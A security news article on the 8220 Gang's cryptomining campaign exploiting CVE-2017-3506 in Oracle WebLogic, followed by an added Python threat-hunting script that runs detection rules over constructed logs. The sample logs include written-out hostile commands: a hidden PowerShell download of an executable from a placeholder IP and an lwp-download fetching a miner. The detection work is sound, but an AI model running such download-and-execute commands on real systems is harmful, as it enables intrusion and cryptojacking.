The cloud-focused threat group appears to have changed its goals while still leaning on Oracle technologies.
Trend Micro researchers have described a new campaign by the 8220 Gang (also known as the 8220 Mining Group), in which the attackers exploited a six-year-old Oracle WebLogic vulnerability to deliver a cryptominer to the compromised system.
The attacks used CVE-2017-3506 (CVSS 7.4), a flaw in the WLS Security component of Oracle WebLogic Server that allows remote execution of arbitrary operating-system commands through an HTTP request carrying a specially crafted XML document. The flaw can be used to gain unauthorized access to sensitive data or to fully compromise the server.
8220 Gang reaches the vulnerable endpoint through the HTTP URI "wls-wsat/CoordinatorPortType". Once initial access is gained, the attackers run a PowerShell script that downloads an executable (including cryptominers) from the IP address of the command-and-control (C2) server.
The downloaded file loads a DLL that is injected into the MSBuild process. The DLL is heavily obfuscated to hinder analysis. Its configuration is Base64-encoded; once decoded, the loader connects to three C2 servers on TCP port 9090, 9091 or 9092 to download the cryptominer.
In recent attacks the group has also used lwp-download, a Perl-based command-line utility (part of libwww-perl, commonly present on Linux systems) that fetches a file from a given URL. Researchers have also observed the same utility being used to compromise Windows systems.
Abuse of lwp-download is likely to continue in the near term and to be turned against additional platforms. Despite reusing tools and C2 servers, the 8220 Gang has begun attacking Windows systems and introducing new payloads and C2 servers to evade detection.
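The intrusion chain above gives a defender a handful of concrete observables: POST requests to the wls-wsat/CoordinatorPortType URI, a PowerShell download from the C2 address, an MSBuild process that should not be there and that talks to TCP 9090, 9091 or 9092, and lwp-download fetching a remote file. The following hunting script is an added example, not code from Trend Micro or from the 8220 Gang's toolkit: it runs those indicators over a constructed WebLogic access log and a constructed host-event log (the log formats, host names, IP addresses, the `x.exe` file name and the list of "normal" MSBuild parent processes are all assumptions made here for illustration) and reports each stage it finds.

```python
"""Hunt for the 8220 Gang WebLogic chain in constructed log samples (added example)."""
import re
from collections import defaultdict

# Indicators taken from the article; every other value in this file is an assumption.
WLS_WSAT_URI = re.compile(r"/wls-wsat/CoordinatorPortType", re.IGNORECASE)
C2_PORTS = {9090, 9091, 9092}
DOWNLOADER_RE = re.compile(
    r"\b(?:lwp-download|Invoke-WebRequest|IWR|DownloadFile|DownloadString|curl|wget)\b", re.IGNORECASE)
# Assumed allowlist of parents that legitimately start MSBuild; anything else is suspicious.
MSBUILD_OK_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "cmd.exe"}

# Constructed sample logs (hypothetical hosts, IPs and formats), not real telemetry.
ACCESS_LOG = """\
10.0.0.5 - - [20/May/2023:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4321
203.0.113.7 - - [20/May/2023:10:01:09 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1190
203.0.113.7 - - [20/May/2023:10:01:10 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1190
10.0.0.8 - - [20/May/2023:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 512
"""
HOST_LOG = """\
2023-05-20T10:01:11Z host=wls01 type=process parent=java.exe image=powershell.exe cmdline="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.7/x.exe','C:\\Users\\Public\\x.exe')"
2023-05-20T10:01:15Z host=wls01 type=process parent=x.exe image=MSBuild.exe cmdline="MSBuild.exe"
2023-05-20T10:01:16Z host=wls01 type=netconn image=MSBuild.exe dst=198.51.100.9 dport=9091 proto=tcp
2023-05-20T10:01:30Z host=wls01 type=process parent=powershell.exe image=lwp-download cmdline="lwp-download http://198.51.100.9/miner /tmp/miner"
2023-05-20T10:03:00Z host=wls02 type=process parent=explorer.exe image=notepad.exe cmdline="notepad.exe"
2023-05-20T10:03:05Z host=wls02 type=netconn image=chrome.exe dst=142.250.0.1 dport=443 proto=tcp
"""

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')   # key=value, value may be double-quoted


def parse_access_log(text):
    """Combined-format access log -> list of dicts; unparseable lines are skipped."""
    return [m.groupdict() for m in (ACCESS_RE.match(l) for l in text.splitlines()) if m]


def parse_host_log(text):
    """'<ts> key=value ...' host events -> list of dicts (quotes stripped from values)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        ev = {"ts": ts}
        for key, val in KV_RE.findall(rest):
            ev[key] = val[1:-1] if val.startswith('"') and val.endswith('"') else val
        events.append(ev)
    return events


def hunt(access_text, host_text):
    """Return one finding per observed stage of the chain, in log order."""
    findings = []
    hits = defaultdict(int)
    for req in parse_access_log(access_text):          # stage 1: exploit endpoint hit
        if WLS_WSAT_URI.search(req["path"]):
            hits[req["src"]] += 1
    for src, n in sorted(hits.items()):
        findings.append({"rule": "wls_wsat_request", "where": src,
                         "evidence": f"{n} request(s) to wls-wsat/CoordinatorPortType"})
    for ev in parse_host_log(host_text):
        image, cmd, host = ev.get("image", "").lower(), ev.get("cmdline", ""), ev.get("host", "?")
        if ev.get("type") == "process":
            if image == "powershell.exe" and DOWNLOADER_RE.search(cmd) and "http" in cmd.lower():
                findings.append({"rule": "powershell_download", "where": host, "evidence": cmd})
            elif image == "msbuild.exe" and ev.get("parent", "").lower() not in MSBUILD_OK_PARENTS:
                findings.append({"rule": "msbuild_spawn", "where": host,
                                 "evidence": f"MSBuild.exe spawned by {ev.get('parent')}"})
            elif image == "lwp-download" or cmd.lower().startswith("lwp-download"):
                findings.append({"rule": "lwp_download", "where": host, "evidence": cmd})
        elif ev.get("type") == "netconn":
            if image == "msbuild.exe" and int(ev.get("dport", 0)) in C2_PORTS:   # stage 3: C2 port
                findings.append({"rule": "msbuild_c2_port", "where": host,
                                 "evidence": f"MSBuild.exe -> {ev['dst']}:{ev['dport']}"})
    return findings


if __name__ == "__main__":
    for f in hunt(ACCESS_LOG, HOST_LOG):
        print(f"[{f['rule']}] {f['where']}: {f['evidence']}")
```

Each rule on its own is noisy (a build server legitimately runs MSBuild, and curl in PowerShell is common), so in practice the value is in correlating the findings by host and time window: an MSBuild process spawned by an unknown parent shortly after a PowerShell download on the same host that also answered wls-wsat requests is a much stronger signal than any single hit. The port check is deliberately tied to the MSBuild image rather than to all traffic on 9090-9092, which are also used by plenty of legitimate services.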
Earlier, researchers at Fortinet FortiGuard Labs reported that the 8220 Gang was delivering a new crypter, ScrubCrypt, to victim systems in order to carry out cryptojacking. That attack chain also begins with the exploitation of Oracle WebLogic servers, which are used to fetch PowerShell scripts that deliver ScrubCrypt.
Experts describe 8220 Gang as low-skilled, financially motivated attackers who compromise AWS, Azure, GCP, Aliyun and QCloud hosts by exploiting vulnerabilities in Docker, Redis, Confluence and Apache. The group also operates its own cryptominer, PwnRig, based on XMRig. PwnRig uses a fake FBI subdomain whose IP address points to a Brazilian government resource.